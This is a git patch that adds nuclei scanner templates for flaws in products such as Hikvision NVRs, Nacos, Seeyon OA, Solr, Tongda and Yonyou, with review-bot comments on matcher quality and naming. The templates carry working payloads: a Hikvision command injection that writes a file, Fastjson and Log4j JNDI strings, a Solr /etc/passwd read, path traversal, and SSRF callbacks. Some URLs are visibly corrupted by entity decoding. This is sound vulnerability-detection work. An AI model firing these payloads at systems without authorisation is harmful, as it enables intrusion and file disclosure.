From 5e7ecf0575f8ce8fd26930d3c4c94a694574ef5c Mon Sep 17 00:00:00 2001
From: Str1am <48739932+Str1am@users.noreply.github.com>
Date: Sun, 7 Aug 2022 17:06:46 +0800
Subject: [PATCH] Add files via upload
---
 .../frServer-listDir.yaml" | 25 ++++++
 .../hivision_ip_rce.yaml" | 23 ++++++
 "\346\226\260\345\242\236/nacos-unauth.yaml" | 40 +++++++++
 "\346\226\260\345\242\236/pma_unauth.yaml" | 22 +++++
 .../seeyon_fastjson.yaml" | 33 ++++++++
 "\346\226\260\345\242\236/seeyon_log4j.yaml" | 33 ++++++++
 "\346\226\260\345\242\236/solr-fileRead.yaml" | 33 ++++++++
 "\346\226\260\345\242\236/solr-rce.yaml" | 24 ++++++
 "\346\226\260\345\242\236/swagger-ui.yaml" | 81 +++++++++++++++++++
 .../sxf-filedownload.yaml" | 22 +++++
 .../thinkCMF_include.yaml" | 22 +++++
 .../tongda_sqli2022.yaml" | 17 ++++
 "\346\226\260\345\242\236/yongyou-ssrf.yaml" | 19 +++++
 13 files changed, 394 insertions(+)
 create mode 100644 "\346\226\260\345\242\236/frServer-listDir.yaml"
 create mode 100644 "\346\226\260\345\242\236/hivision_ip_rce.yaml"
 create mode 100644 "\346\226\260\345\242\236/nacos-unauth.yaml"
 create mode 100644 "\346\226\260\345\242\236/pma_unauth.yaml"
 create mode 100644 "\346\226\260\345\242\236/seeyon_fastjson.yaml"
 create mode 100644 "\346\226\260\345\242\236/seeyon_log4j.yaml"
 create mode 100644 "\346\226\260\345\242\236/solr-fileRead.yaml"
 create mode 100644 "\346\226\260\345\242\236/solr-rce.yaml"
 create mode 100644 "\346\226\260\345\242\236/swagger-ui.yaml"
 create mode 100644 "\346\226\260\345\242\236/sxf-filedownload.yaml"
 create mode 100644 "\346\226\260\345\242\236/thinkCMF_include.yaml"
 create mode 100644 "\346\226\260\345\242\236/tongda_sqli2022.yaml"
 create mode 100644 "\346\226\260\345\242\236/yongyou-ssrf.yaml"
diff --git "a/\346\226\260\345\242\236/frServer-listDir.yaml" "b/\346\226\260\345\242\236/frServer-listDir.yaml"
new file mode 100644
index 0000000..31d926f
--- /dev/null
+++ "b/\346\226\260\345\242\236/frServer-listDir.yaml"
@@ -0,0 +1,25 @@
+id: frServer-listDir
+
+info:
+ name: 帆软目录遍历漏洞
+ author: Str1am
+ severity: high
+ tags: frServer,listDir
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true"
+ - "{{BaseURL}}/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true"
+ - "{{BaseURL}}/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "isDir"
+ - "envPath"
+ part: body
+ condition: and
\ No newline at end of file
diff --git "a/\346\226\260\345\242\236/hivision_ip_rce.yaml" "b/\346\226\260\345\242\236/hivision_ip_rce.yaml"
new file mode 100644
index 0000000..e0413f9
--- /dev/null
+++ "b/\346\226\260\345\242\236/hivision_ip_rce.yaml"
@@ -0,0 +1,23 @@
+id: hivision_NVR_RCE
+
+info:
+ name: 海康威视_NVR_IP摄像头
+ author: str1am
+ severity: critical
+ tags: hikvision,rce
+
+requests:
+ - raw:
+ - |
+ PUT /SDK/webLanguage HTTP/1.1
+ Host: {{Hostname}}
+ X-Requested-With: XMLHttpRequest
+ Content-Type: application/x-www-form-urlencoded
+
+ $(ls -l > webLib/x)
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 500
\ No newline at end of file
diff --git "a/\346\226\260\345\242\236/nacos-unauth.yaml" "b/\346\226\260\345\242\236/nacos-unauth.yaml"
new file mode 100644
index 0000000..5dc5bb4
--- /dev/null
+++ "b/\346\226\260\345\242\236/nacos-unauth.yaml"
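Review bot: All three `path` entries contain `¤tUserName=admin¤tUserId=1`, which is what `&currentUserName=admin&currentUserId=1` becomes after an HTML-entity pass (`&curren` decodes to `¤`); as stored, the query string has lost two `&` separators and the parameters the endpoint presumably keys on, so the template will under-report rather than detect. Restore the literal `&currentUserName=admin&currentUserId=1` in all three URLs and re-save the file without entity decoding. `info` also lacks a `description` and `reference`, which a triager needs to confirm a `high` finding.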
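Review bot: The only matcher is `status: 500`, so any server error on `PUT /SDK/webLanguage` — a method-not-allowed handler, a WAF, a rejected content type — is reported as a `critical` RCE; a bare status code is not enough evidence for that severity, and the template should either pin something specific in the response body or document why a 500 is diagnostic here. The request body also writes a file (`webLib/x`) on the device, so the check is not idempotent and leaves an artifact on every scanned host; that side effect belongs in `info.description` so operators know what the scan does. `id: hivision_NVR_RCE` does not match the filename `hivision_ip_rce.yaml`, and the vendor is spelled `hikvision` in `tags` but `hivision` in the id.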
@@ -0,0 +1,40 @@
+id: nacos-unauth
+
+info:
+ name: Nacos 1.x - Authentication Bypass
+ author: taielab,pikpikcu
+ severity: critical
+ description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data."
+ reference:
+ - https://github.com/alibaba/nacos/issues/4593
+ - https://nacos.io/en-us/docs/auth.html
+ tags: nacos,unauth
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
+ - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
+ headers:
+ User-Agent: Nacos-Server
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Content-Type: application/json"
+ part: header
+
+ - type: regex
+ regex:
+ - '"username":'
+ - '"password":'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/20
\ No newline at end of file
diff --git "a/\346\226\260\345\242\236/pma_unauth.yaml" "b/\346\226\260\345\242\236/pma_unauth.yaml"
new file mode 100644
index 0000000..b08212e
--- /dev/null
+++ "b/\346\226\260\345\242\236/pma_unauth.yaml"
@@ -0,0 +1,22 @@
+id: pma_unauth
+
+info:
+ name: pma未授权访问
+ author: str1am
+ severity: high
+ tags: pma
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pma/setup/index.php"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "phpMyAdmin setup"
+ part: body
+ condition: and
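Review bot: `description` is a single ~600-character double-quoted scalar; a `>-` folded block keeps it within a normal line-length limit and removes the need to escape quotes inside it. The `User-Agent: Nacos-Server` line under `headers` is the one non-obvious part of the request and, going by the linked issue, appears to be what the bypass depends on; a one-line comment above it, e.g. `# server-to-server UA; see reference #1`, would spare the next reader a trip to the issue tracker.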
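Review bot: `id: pma_unauth` uses an underscore while `frServer-listDir`, `nacos-unauth` and `solr-rce` use hyphens; the batch mixes both styles (`seeyon_fastjson`, `seeyon_log4j`, `thinkCMF_include`, `tongda_sqli2022` vs `solr-fileRead`, `sxf-filedownload`, `yongyou-ssrf`), and ids and filenames should settle on one convention. `info` carries no `description` or `reference`, so a reader cannot tell which phpMyAdmin configurations leave `setup/index.php` reachable or why a reachable setup page is rated `high`. `author` is also spelled `str1am` here and `Str1am` in the other files, which splits the same author in any per-author listing.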
diff --git "a/\346\226\260\345\242\236/seeyon_fastjson.yaml" "b/\346\226\260\345\242\236/seeyon_fastjson.yaml"
new file mode 100644
index 0000000..89b892c
--- /dev/null
+++ "b/\346\226\260\345\242\236/seeyon_fastjson.yaml"
@@ -0,0 +1,33 @@
+id: seeyon_fastjson
+
+info:
+ name: 致远seeyon_fastjson漏洞
+ author: Str1am
+ severity: critical
+ tags: seeyon,seeyon_fastjson
+
+requests:
+ - raw:
+ - |
+ POST /seeyon/main.do?method=changeLocale HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 79
+ Cache-Control: max-age=0
+ Upgrade-Insecure-Requests: 1
+ Content-Type: application/x-www-form-urlencoded
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
+ Cookie: JSESSIONID=5418C5A5511E3BC9806412DD8023386E; loginPageURL=""
+ Connection: close
+
+ _json_params={"a": {"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b": {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{interactsh-url}}","autoCommit":true}}
+
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
\ No newline at end of file
diff --git "a/\346\226\260\345\242\236/seeyon_log4j.yaml" "b/\346\226\260\345\242\236/seeyon_log4j.yaml"
new file mode 100644
index 0000000..be36f21
--- /dev/null
+++ "b/\346\226\260\345\242\236/seeyon_log4j.yaml"
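Review bot: `Content-Length: 79` does not match the body that follows — the `_json_params=` line is well over 79 bytes once `{{interactsh-url}}` is expanded; nuclei normally recomputes the header for raw requests, but wherever it is honored the body is truncated and the request never reaches the parser being tested, so drop the header rather than hand-maintain it. The request also replays a captured browser session (`Cookie: JSESSIONID=…`, `Accept*`, `Upgrade-Insecure-Requests`, `Cache-Control`) that plays no role in the check; keep only `Host`, `Content-Type` and the body so the template is readable and does not carry a stale session id into every scan. The same capture noise (and five trailing blank lines in the raw block) is present in the `seeyon_log4j` hunk.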
@@ -0,0 +1,33 @@
+id: seeyon_log4j
+
+info:
+ name: 致远oa-log4j漏洞
+ author: Str1am
+ severity: critical
+ tags: seeyon,log4j
+
+requests:
+ - raw:
+ - |
+ GET /seeyon/index.jsp HTTP/1.1
+ Host: {{Hostname}}
+ Pragma: no-cache
+ Cache-Control: no-cache
+ Upgrade-Insecure-Requests: 1
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
+ Connection: close
+ X-Forwarded-For: ${jndi:dns://seeyon.{{interactsh-url}}/test}
+
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
\ No newline at end of file
diff --git "a/\346\226\260\345\242\236/solr-fileRead.yaml" "b/\346\226\260\345\242\236/solr-fileRead.yaml"
new file mode 100644
index 0000000..3a9e80f
--- /dev/null
+++ "b/\346\226\260\345\242\236/solr-fileRead.yaml"
@@ -0,0 +1,33 @@
+id: solr-fileRead
+
+info:
+ name: solr 任意文件读取
+ author: Str1am
+ severity: high
+ tags: solr,fileRead
+
+requests:
+ - raw:
+ - |
+ POST /solr/supplierSearch_V2/debug/dump?param=ContentStreams HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: python-requests/2.26.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: keep-alive
+ Content-Length: 27
+ Content-Type: application/x-www-form-urlencoded
+
+ stream.file=%2Fetc%2Fpasswd
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "root:x"
+ - "/bin/bash"
+ part: body
+ condition: and
\ No newline at end of file
diff --git "a/\346\226\260\345\242\236/solr-rce.yaml" "b/\346\226\260\345\242\236/solr-rce.yaml"
new file mode 100644
index 0000000..1905afb
--- /dev/null
+++ "b/\346\226\260\345\242\236/solr-rce.yaml"
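Review bot: Both `words` are required (`condition: and`), and `/bin/bash` is not present in every `/etc/passwd` — root's shell is `/bin/sh` on Debian, Alpine and BusyBox images and on many hardened hosts — so the template under-reports; `root:x` alone, or the usual regex anchored on the root entry (`root:.*:0:0:`), is the more reliable signature. The request path hardcodes the core name `supplierSearch_V2`, which belongs to one particular deployment, so the template silently fails on any other Solr instance; either say so in `info.description` or turn the core into a template variable. The same hardcoded core appears in the `solr-rce` hunk.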
@@ -0,0 +1,24 @@
+id: solr-rce
+
+info:
+ name: solr命令执行
+ author: str1am
+ severity: high
+ tags: solr
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/solr/supplierSearch_V2/dataimport"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "responseHeader"
+ - "initArgs"
+ - "statusMessages"
+ part: body
+ condition: and
diff --git "a/\346\226\260\345\242\236/swagger-ui.yaml" "b/\346\226\260\345\242\236/swagger-ui.yaml"
new file mode 100644
index 0000000..12d4726
--- /dev/null
+++ "b/\346\226\260\345\242\236/swagger-ui.yaml"
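Review bot: The request only fetches `/solr/supplierSearch_V2/dataimport` and matches `responseHeader`/`initArgs`/`statusMessages`, i.e. it confirms that the DataImportHandler answers on that core; nothing in the template demonstrates command execution, so `name: solr命令执行` and `severity: high` overstate what a match proves and will be read as a confirmed RCE by whoever triages the output. Rename it as a DataImportHandler-exposure check, or add an `info.description` stating that a match is a precondition rather than exploitation, and set the severity to match. The core name is hardcoded here as in `solr-fileRead`, so the template only applies to the deployment it was captured from.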
@@ -0,0 +1,81 @@
+id: swagger-api
+
+info:
+ name: Public Swagger API
+ author: pdteam,c-sh0
+ severity: info
+ tags: exposure,api,swagger
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/swagger-ui/swagger-ui.js"
+ - "{{BaseURL}}/swagger/swagger-ui.js"
+ - "{{BaseURL}}/swagger-ui.js"
+ - "{{BaseURL}}/swagger/ui/swagger-ui.js"
+ - "{{BaseURL}}/swagger/ui/index"
+ - "{{BaseURL}}/swagger/index.html"
+ - "{{BaseURL}}/swagger-ui.html"
+ - "{{BaseURL}}/swagger/swagger-ui.html"
+ - "{{BaseURL}}/api/swagger-ui.html"
+ - "{{BaseURL}}/api-docs/swagger.json"
+ - "{{BaseURL}}/api-docs/swagger.yaml"
+ - "{{BaseURL}}/api_docs"
+ - "{{BaseURL}}/swagger.json"
+ - "{{BaseURL}}/swagger.yaml"
+ - "{{BaseURL}}/swagger/v1/swagger.json"
+ - "{{BaseURL}}/swagger/v1/swagger.yaml"
+ - "{{BaseURL}}/api/index.html"
+ - "{{BaseURL}}/api/docs/"
+ - "{{BaseURL}}/api/swagger.json"
+ - "{{BaseURL}}/api/swagger.yaml"
+ - "{{BaseURL}}/api/swagger.yml"
+ - "{{BaseURL}}/api/swagger/index.html"
+ - "{{BaseURL}}/api/swagger/swagger-ui.html"
+ - "{{BaseURL}}/api/api-docs/swagger.json"
+ - "{{BaseURL}}/api/api-docs/swagger.yaml"
+ - "{{BaseURL}}/api/swagger-ui/swagger.json"
+ - "{{BaseURL}}/api/swagger-ui/swagger.yaml"
+ - "{{BaseURL}}/api/apidocs/swagger.json"
+ - "{{BaseURL}}/api/apidocs/swagger.yaml"
+ - "{{BaseURL}}/api/swagger-ui/api-docs"
+ - "{{BaseURL}}/api/api-docs"
+ - "{{BaseURL}}/api/apidocs"
+ - "{{BaseURL}}/api/swagger"
+ - "{{BaseURL}}/api/swagger/static/index.html"
+ - "{{BaseURL}}/api/swagger-resources"
+ - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs"
+ - "{{BaseURL}}/api/__swagger__/"
+ - "{{BaseURL}}/api/_swagger_/"
+ - "{{BaseURL}}/api/spec/swagger.json"
+ - "{{BaseURL}}/api/spec/swagger.yaml"
+ - "{{BaseURL}}/api/swagger/ui/index"
+ - "{{BaseURL}}/__swagger__/"
+ - "{{BaseURL}}/_swagger_/"
+ - "{{BaseURL}}/api/v1/swagger-ui/swagger.json"
+ - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml"
+ - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs"
+ - "{{BaseURL}}/api/swagger_doc.json"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "swagger:"
+ - "Swagger 2.0"
+ - "\"swagger\":"
+ - "Swagger UI"
+ - "**token**:"
+ condition: or
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
diff --git "a/\346\226\260\345\242\236/sxf-filedownload.yaml" "b/\346\226\260\345\242\236/sxf-filedownload.yaml"
new file mode 100644
index 0000000..380151f
--- /dev/null
+++ "b/\346\226\260\345\242\236/sxf-filedownload.yaml"
@@ -0,0 +1,22 @@
+id: sxf-filedownload
+
+info:
+ name: 深信服文件下载
+ author: Str1am
+ severity: high
+ tags: solr
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fGlobal.asax"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "QiHang.Media.Web.Global"
+ part: body
+ condition: and
\ No newline at end of file
diff --git "a/\346\226\260\345\242\236/thinkCMF_include.yaml" "b/\346\226\260\345\242\236/thinkCMF_include.yaml"
new file mode 100644
index 0000000..9148b7c
--- /dev/null
+++ "b/\346\226\260\345\242\236/thinkCMF_include.yaml"
@@ -0,0 +1,22 @@
+id: thinkCMF_include
+
+info:
+ name: thinkCMF文件包含漏洞
+ author: str1am
+ severity: high
+ tags: pma
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?a=display&templateFile=README.md"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "官网:http://www.thinkcmf.com"
+ part: body
+ condition: and
diff --git "a/\346\226\260\345\242\236/tongda_sqli2022.yaml" "b/\346\226\260\345\242\236/tongda_sqli2022.yaml"
new file mode 100644
index 0000000..4620897
--- /dev/null
+++ "b/\346\226\260\345\242\236/tongda_sqli2022.yaml"
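Review bot: `id: swagger-api` does not match the filename `swagger-ui.yaml`; nuclei reports and de-duplicates by id, so this copy would collide with the upstream `swagger-api` template if both are loaded, and the file should either keep the upstream filename or get a distinct id. In the extractor regex `(v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})` the dots are unescaped and match any character, so `v1x2y3` is accepted as a version; a single-quoted scalar avoids YAML escape issues: `- ' @version (v[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})'`.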
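Review bot: `tags: solr` is a copy-paste leftover — the template is named for 深信服 (Sangfor) and probes `QH.aspx?responderId=ResourceNewResponder&action=download`, which has nothing to do with Solr, so `-tags solr` runs will include it and any product-specific tag run will miss it; use `tags: sxf,filedownload` or similar. The `thinkCMF_include` hunk has the same problem with `tags: pma`. Neither template has a `description` or `reference` for its `high` rating.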
@@ -0,0 +1,17 @@
+id: tongda_sqli2022
+
+info:
+ name: 通达oa sql注入
+ author: Str1am
+ severity: high
+ tags: tongda,sqli
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git "a/\346\226\260\345\242\236/yongyou-ssrf.yaml" "b/\346\226\260\345\242\236/yongyou-ssrf.yaml"
new file mode 100644
index 0000000..255a19d
--- /dev/null
+++ "b/\346\226\260\345\242\236/yongyou-ssrf.yaml"
@@ -0,0 +1,19 @@
+id: yongyou-ssrf
+
+info:
+ name: yongyou-ssrf
+ author: str1am
+ severity: high
+ tags: yongyou,ssrf
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/uapws/service/nc.pubitf.rbac.IUserPubServiceWS?xsd=http://{{interactsh-url}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
\ No newline at end of file
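Review bot: The only matcher is `status: 200` and the request carries no parameters at all, so a match proves only that `query.php` exists — every reachable Tongda OA install, and any catch-all handler, is reported as a `high` SQL injection. Add a body matcher that separates the vulnerable endpoint's response from a generic 200 (at minimum a `word` matcher under the existing `matchers-condition: and`), and either rename this to an endpoint-exposure check or explain in `info.description` why existence alone implies the flaw. `info` also has no `description` or `reference`, so nothing on the page supports the `2022` in the id.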
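Review bot: `name: yongyou-ssrf` merely repeats the id; `info.name` should name the product and the flaw (e.g. `Yonyou NC uapws IUserPubServiceWS - SSRF`), and a `description`/`reference` are missing. The matcher accepts any DNS interaction, but the injected value is an `http://` URL, so if the endpoint really fetches the `xsd` the `http` protocol interaction is the stronger signal to match on; DNS alone also fires when an intermediate resolver or proxy resolves the name without the target ever connecting, which is a known false-positive source for out-of-band checks.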